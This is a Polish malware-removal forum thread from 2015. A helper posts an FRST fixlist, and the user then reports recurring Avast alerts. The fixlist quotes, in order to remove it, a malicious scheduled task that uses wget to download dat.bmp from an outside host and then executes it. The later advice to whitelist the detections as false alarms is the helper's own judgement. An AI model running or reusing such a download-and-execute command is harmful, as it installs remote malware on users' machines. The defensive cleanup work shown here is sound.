Logi do sprawdzenia

Drzewko
Od najstarszego
Od najnowszego

Gość: Kolobos Re: Logi do sprawdzenia IP: *.zask.pl 10.06.15, 21:49

Odinstaluj: HDD Regenerator

Fixlist.txt dla FRST:
Task: {3E29FEBE-91E9-48AA-86FC-FF2F33692C6D} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp grogle.in/dat.bmp?data=fHAZvdHTc5;aida64business460.exe;1424871165 & start cmd /R dat.bmp <==== ATTENTION
HKU\S-1-5-21-2651406073-388500075-993997319-1001\...\Run: [Fatal1tySTU] => [X]
R3 ArdDrv; \??\C:\Windows\SysWOW64\Drivers\ArdDrv.sys [X]
S3 IntcAzAudAddService; \SystemRoot\system32\drivers\RTKVHD64.sys [X]
2015-06-09 17:00 - 2015-06-09 17:08 - 00000000 ____D C:\AdwCleanerv2
2015-02-25 15:46 - 2015-02-25 15:53 - 0000000 _____ () C:\ProgramData\dat.bmp
EmptyTemp:
- pudellson Re: Logi do sprawdzenia 11.06.15, 16:37
  
  jak na razie znikło :) wielkie po stokroć dzięki, bo myślałem że już będę musiał od nowa stawiać system.
  Wyrzuciło mi ikonę głośnika i nie można było jej przywrócić ale po wyczyszczeniu Ccleaner'em i restarcie udało mi się odblokować ją i wróciła mi na pasek.
  Dziękuje jeszcze raz :)
  - pudellson Re: Logi do sprawdzenia 12.06.15, 15:47
    
    Znowu wywalił mi ten sam wirus...
    Nwm czy to nie przypadkiem przez to że siostra wchodziła na fb oraz yt z konta administratora pod moją nieobecność a w przeglądarce nie miałem adblocka ehh.
    Poniżej logi oraz zdj alertu avasta ;/
    
    FRST
    wklej.org/id/1736681/
    
    Addition
    wklej.org/id/1736682/
    
    Alert
    zapodaj.net/1c55dc8c9914c.jpg.html
    
    Chyba jednak będzie mnie czekało od nowa stawianie skoro tak mnie atakuje... ;/
    - Gość: Kolobos Re: Logi do sprawdzenia IP: *.zask.pl 13.06.15, 09:47
      
      Nie ma infekcji. Usun wszystko z temp.
      - pudellson Re: Logi do sprawdzenia 15.06.15, 10:06
        
        Przepraszam za zwłokę ale mnie nie było.
        
        Oba katalogi TEMP czyści mi Ccleaner.... ale mimo wszystko wyczyściłem ręcznie i opróżniłem kosz.
        
        Wbiłem na facebooka i znów avast wywalił mi alert ten co powyżej...
        
        W Avast w ustawieniach osłony WWW mam ustawioną czułość wysoką, testowanie całych plików, oraz skanowanie w poszukiwaniu PNP.
        Pomyślałem że zbyt wysoka czułość a dokładnie przez skanowanie PNP może wywalać naciągane alerty...
        ale w takim przypadku od samego początku powinienem mieć takie alerty, a mam je dopiero od jakiegoś czasu.
        
        Odznaczył bym te skanowanie PNP i testowanie całych plików, ale trochę się obawiam że jak zaniżę czułość to prędzej coś mi się niechcianego ściągnie na kompa.
        
        Może mieć to duże znaczenie względem tych alertów, a pliki temp które wykrywa nie są groźne?
        tylko czemu atakuje ten werfault.exe ... ;/ a nie plik przeglądarki skoro przez nią leci? zazwyczaj pisze że wywala z chrome a nie z jakiegoś pliku systemowego .... ;/
        
        Gość: Kolobos Re: Logi do sprawdzenia IP: *.internetdsl.tpnet.pl 16.06.15, 11:20
        
        Zresetuj przegladarke support.google.com/chrome/answer/3296214?hl=pl wczesniej zgraj zakladki itp.
        
        pudellson Re: Logi do sprawdzenia 16.06.15, 22:35
        
        Ustawienia zresetowane, temp ponownie wyczyszczone,.. kilka godzin spokoju i podczas załączenia allegro co poniżej
        zapodaj.net/fc8d3e7d92bf1.jpg.html
        
        po zresetowaniu przeglądarki oczywiście zakładki przywróciłem i zainstalowałem Adblocka plus jak zawsze...
        :D sie uwzieło na mnie
        
        Gość: Kolobos Re: Logi do sprawdzenia IP: *.internetdsl.tpnet.pl 17.06.15, 10:08
        
        To chyba falszywy alarm, sprawdz ten plik na jotti oraz virustotal.
        
        pudellson Re: Logi do sprawdzenia 17.06.15, 14:06
        
        Scan z Jotti,
        virusscan.jotti.org/pl/scanresult/0212d156577cf39c5b12881153cf8737ee62a1e6
        
        Scan z virustotal
        www.virustotal.com/pl/file/22c9bea011a5a02a4d38ec95296c0d476ed9dc232a70cf1769e07554463d4beb/analysis/1434542464/
        
        a jednak coś wykrywa ;/
        
        Gość: Kolobos Re: Logi do sprawdzenia IP: *.internetdsl.tpnet.pl 18.06.15, 11:26
        
        Nic nie wykrywa, to falszywy alarm. Dodaj to do wyjątków.
        
        pudellson Re: Logi do sprawdzenia 18.06.15, 19:40
        
        skoro to fałszywy alarm to czemu zaczęło atakować mnie dopiero jakiś czas temu a nie wcześniej,
        i czemu takie uparte jest? nawet do 30razy dziennie, a czasem tylko 5razy.
        zresetowałem ustawienia avasta ale zwiększyłem czułość na osłonie www. ale nadal tak samo.
        
        cieżko dodać to do wyjątków bo pliki mają inne końcówki i wciąż się zmieniają, chyba ze wpisanie ścieżki z /WAX* zrobi wyjątek dla wszystkich plików z początkiem tej nazwy...
        
        Gość: Kolobos Re: Logi do sprawdzenia IP: *.internetdsl.tpnet.pl 19.06.15, 10:35
        
        Skoro tylko avast to wykrywa to musi byc falszywy alarm. Zmien program antywirusowy. Np. Avg jest darmowy.
        
        pudellson Re: Logi do sprawdzenia 19.06.15, 10:51
        
        miałem Avire na drugim kompie, ale moim zdaniem do dupy była.
        no cóż, dziękuje za Pomoc...

Najnowsze z forum Wirusy, trojany, spyware

Zaloguj się